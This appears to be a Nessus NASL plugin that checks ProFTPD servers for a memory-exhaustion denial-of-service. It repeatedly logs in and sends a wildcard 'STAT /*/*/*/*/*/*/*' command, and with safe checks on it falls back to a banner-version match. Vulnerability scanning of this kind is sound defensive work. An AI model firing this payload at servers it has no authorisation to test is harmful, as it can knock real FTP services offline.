New ProFTPD exhaustion attack
I just hacked proftpd_exhaust.nasl...
#
# This script was written by Michel Arboi <arboi_at_algoriel.fr>
# starting from proftd_exhaust.nasl by Renaud Deraison
#
# GNU Public Licence
#
# References:
# Date: Sun, 8 Dec 2002 13:53:57 +0100 (MET)
# From:"Rob klein Gunnewiek" <rmkleing_at_hio.hen.nl>
# To:bugtraq_at_securityfocus.com, vulnwatch_at_vulnwatch.org
# Subject: proftpd <=1.2.7rc3 DoS
#
#
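if(description)
{
 # Plugin registration. Only run by the scheduler when it loads the script
 # in "description" mode; the actual test starts after this block.
 script_id(11189);
 script_version ("$Revision$");

 # Plugin title (same wording in both languages).
 name["english"] = "proftpd /*/* exhaustion attack";
 name["francais"] = "proftpd /*/* exhaustion attack";
 script_name(english:name["english"], francais:name["francais"]);

 # Report text shown to the user. The English wording is fixed
 # ("may makes" -> "may make"); everything else is unchanged.
 desc["english"] = "
The remote FTP server seems to be vulnerable to an exhaustion
attack which may make it consume all available memory and CPU
on the remote host when it receives several times the command :
STAT /*/*/*/*/*/*/*
Solution : upgrade to ProFTPd 1.2.7 if the remote server is proftpd,
or contact your vendor for a patch.
Risk factor : High";
 desc["francais"] = "
Le serveur FTP distant semble vulnérable à une attaque lui faisant
consommer toutes les ressources de la machine distante lorsqu'il
reçoit plusieurs fois la commande :
STAT /*/*/*/*/*/*/*
Solution : Si le serveur distant est ProFTPd, alors passez en
version 1.2.7, sinon contactez votre vendeur pour un patch
Facteur de risque : Elevé";
 script_description(english:desc["english"], francais:desc["francais"]);
 script_summary(english:"Sends /*/*/*/* to the remote proftpd",
                francais:"Envoie /*/*/*/* au proftpd distant");

 # ACT_ATTACK: this plugin can take the target's FTP daemon down, so the
 # scanner only schedules it when destructive tests are permitted.
 script_category(ACT_ATTACK);
 script_family(english:"FTP", francais:"FTP");
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
                  francais:"Ce script est Copyright (C) 2002 Michel Arboi");

 # ftp_anonymous.nasl populates ftp/login and ftp/password in the KB; the
 # active test below needs them. Without them only the banner is checked.
 script_dependencie("find_service.nes", "ftp_anonymous.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}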
#
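# Locate the FTP service; fall back to 21 if find_service did not register it.
port = get_kb_item("Services/ftp");
if(!port) port = 21;
if(!get_port_state(port)) exit(0);

# Credentials gathered by ftp_anonymous.nasl (typically anonymous access).
login = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");

# Without a login we cannot issue STAT, and when safe checks are enabled we
# must not try to starve the daemon: in both cases fall back to a passive
# banner/version check. This is weaker evidence than the active test -- a
# vendor may have backported the fix without bumping the version string, and
# a hidden or multi-line ("220-...") banner will not match the anchored
# pattern below, so nothing is reported for it.
if(!login || safe_checks())
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  r = recv(socket:soc, length:1024);
  # Affected: 1.1.x, 1.2.0 - 1.2.6 and 1.2.7rcN. The original pattern had an
  # unbalanced parenthesis and could never match; the non-digit/end guard
  # after [0-6] keeps a "1.2.10"-style version from matching as "1.2.1".
  if(ereg(pattern:"^220 ProFTPD (1\.1\.|1\.2\.[0-6]([^0-9]|$)|1\.2\.7rc)",
          string:r))
   security_hole(port);
  close(soc);
 }
 exit(0);
}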
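# Active test: on 25 fresh connections, log in and send the expensive
# wildcard STAT, then consider the daemon dead when it stops accepting new
# connections. STAT <pathname> returns its listing on the control channel
# (RFC 959), so the PASV data socket inherited from the original script is
# optional: its failure must not abort the test or be read from blindly.
req = string("STAT /*/*/*/*/*/*/*\r\n");
soc = open_sock_tcp(port);
if(! soc) exit(0);

for (i = 0; i < 25; i = i + 1)
{
 if(ftp_log_in(socket:soc, user:login, pass:pass))
 {
  soc2 = 0;
  pasv_port = ftp_get_pasv_port(socket:soc);
  if(pasv_port)
   soc2 = open_sock_tcp(pasv_port, transport:get_port_transport(port));

  send(socket:soc, data:req);
  # The replies are read only to give the server time to process the
  # request; their content is not examined.
  code = recv_line(socket:soc, length:4096, timeout:3);
  if(soc2)
  {
   data = recv(socket:soc2, length:4096, timeout:3);
   close(soc2);
  }
  send(socket:soc, data:string("QUIT\r\n\r\n"));
  close(soc);
 }
 else
 {
  # Login failed: release the control socket (the original leaked it and
  # reopened a new one on every iteration).
  close(soc);
  # Unusable credentials on the very first attempt mean there is nothing to
  # test. Later failures may be the daemon starving, so keep going.
  if(i == 0) exit(0);
 }

 sleep(1);
 soc = open_sock_tcp(port);
 if(! soc)
 {
  # A refused connection can also come from a MaxInstances/MaxClients limit
  # or a transient hiccup rather than a crash; wait and retry once before
  # reporting to reduce false positives.
  sleep(5);
  soc = open_sock_tcp(port);
  if(! soc) { security_hole(port); exit(0); }
 }
}
close(soc);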